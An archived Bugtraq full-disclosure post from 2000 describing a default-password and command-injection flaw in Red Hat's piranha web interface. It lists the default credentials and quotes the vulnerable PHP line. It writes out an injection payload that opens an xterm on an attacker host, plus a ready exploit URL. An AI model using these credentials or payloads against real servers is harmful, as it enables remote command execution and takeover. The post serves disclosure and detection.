Bugtraq mailing list archives
piranha default password/exploit
From: vision () WHITEHATS COM (Max Vision)
Date: Mon, 24 Apr 2000 17:42:28 -0700
Hi, In the interest of full disclosure (I used an alias the last few times, let's see how this goes as me) here are the details of the piranha vulnerability. RE: ISS Security Advisory iss.00-04-24.Piranha To summarize, piranha is a GUI tool for monitoring, configuring, and administering an LVS cluster. The Redhat 6.2 package piranha-0.4.12 supports web-based php3 interface which is protected by basic authentication. A default account is provided, that if known, would allow remote users to change the piranha password as well as run arbitrary commands on the web server by exploiting a hole in the passwd.php3 script. First the IDS Signature to detect the attack: http://whitehats.com/IDS/272 (See http://whitehats.com/ids/ for basic information about using signatures to detect attacks on your network.) Now the exploit: There are basically two problems with the piranha-0.4.12 package, that when combined yield shell access for an attacker. The reason earlier versions are not vulnerable is because of the shift away from the gui, towards a web-based php3 interface. The first problem is the default account and password that protect the web directory containing the administrative php3 scripts. This is what ISS called a "backdoor" - which is actually a default password. (If ISS found something other than what I found, please email me...) The default username/password is: piranha/q Now the ironic part is, the second part of the vulnability lies within the program that is used to change the password! By default this is installed into /home/httpd/html/piranha/secure as passwd.php3, or: http://victim.example.com/piranha/secure/passwd.php3 Once you authenticate (see first vulnerability), a form will come up asking for the new password. To avoid typo-regret, you must enter the password twice. It will then proceed to change the piranha password to whatever you provided as the new password. It does this by passing your input to a shell command without filtering for metacharacters... passwd.php3: echo "<TD>The passwords you supplied match<BR>"; $temp = `/usr/bin/htpasswd -b passwords piranha $try1`; As one can see, this allows for more creative "new passwords", such as this one: g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut; Example exploit URL (requires authentication): http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT Fix is available for x86 RH 6.2 users at ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm -- Max Vision Network Security <vision () whitehats com> Network Security Assessment http://maxvision.net/ 100% Success Rate : Penetration Testing & Risk Mitigation Free Visibility Analysis and Price Quote for Your Network
Current thread:
- Re: Solaris 7 x86 lpset exploit., (continued)
- Re: Solaris 7 x86 lpset exploit. Eugene Ilchenko (Apr 26)
- Cisco HTTP possible bug: Keith Woodworth (Apr 26)
- Alert: Cart32 secret password backdoor (CISADV000427) Cerberus Security Team (Apr 26)
- Re: Alert: Cart32 secret password backdoor (CISADV000427) Bill Borton (Apr 28)
- Re: Alert: Cart32 secret password backdoor (CISADV000427) Knud Erik Højgaard (Mar 30)
- Re: Solaris 7 x86 lpset exploit. Jor (Apr 27)
- Re: Solaris 7 x86 lpset exploit. Casper Dik (Apr 28)
- Re: piranha default password/exploit Cristian Gafton (Apr 25)
- Re: piranha default password/exploit CDI (Apr 25)
- Re: piranha default password/exploit Matt Wilson (Apr 26)
- fingerd Psarras Nikos (Apr 27)
- Re: fingerd Brock Sides (Apr 27)
- Re: fingerd Jeremy Rauch (Apr 27)
- Cartfix Secret Backdoor Patch tool for cart32 Weld Pond (Apr 27)
- Re: ISS Security Advisory: Backdoor Password in Red Hat Linux Virtual Server Package Cristian Gafton (Apr 25)